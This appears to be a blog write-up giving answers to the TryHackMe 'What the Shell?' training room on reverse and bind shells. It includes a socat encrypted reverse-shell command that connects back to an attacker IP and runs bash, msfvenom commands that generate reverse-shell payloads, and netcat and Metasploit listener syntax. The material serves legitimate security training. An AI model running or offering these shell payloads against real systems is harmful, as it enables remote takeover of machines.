Tryhackme What the Shell Writeup

This is a write-up for a room called 'What the Shell?' on Tryhackme

Task 3 Types of Shell

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A:  R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A:  N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A:  T

   

Task 4 Netcat 

Q:  Which option tells netcat to listen?

A:  -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080 

 

Task 5 Netcat Shell Stabilisation

Q: How would you change your terminal size to have 238 columns?

A:  stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A:  sudo python3 -m http.server 80

 

Task 6 Socat  

Q: How would we get socat to listen on TCP port 8080?

A:  TCP-L:8080 

 

Task 7 Socat Encrypted Shells

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

A:  socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q:  If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A:  socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

 

Task 8 Common Shell Payloads

Q: What command can be used to create a named pipe in Linux?

A:  mkfifo 

 

Task 9 msfvenom  

Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port

A:  msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>

Q: Which symbol is used to show that a shell is stageless?

A:  _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf  and the output filename should be shell

A:  msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

 

Task 10 Metasploit multi/handler 

Q: What command can be used to start a listener in the background?

A:  exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A:  sessions 10

 Task 13 Practice and Examples 

Read more »
at 1 comment:
Subscribe to: Posts (Atom)

Tryhackme What the Shell Writeup

This is a write-up for a room called 'What the Shell?' on Tryhackme Task 3 Types of Shell Q: Which type of shell connects back to ...

  • Tryhackme What the Shell Writeup
    This is a write-up for a room called 'What the Shell?' on Tryhackme Task 3 Types of Shell Q: Which type of shell connects back to ...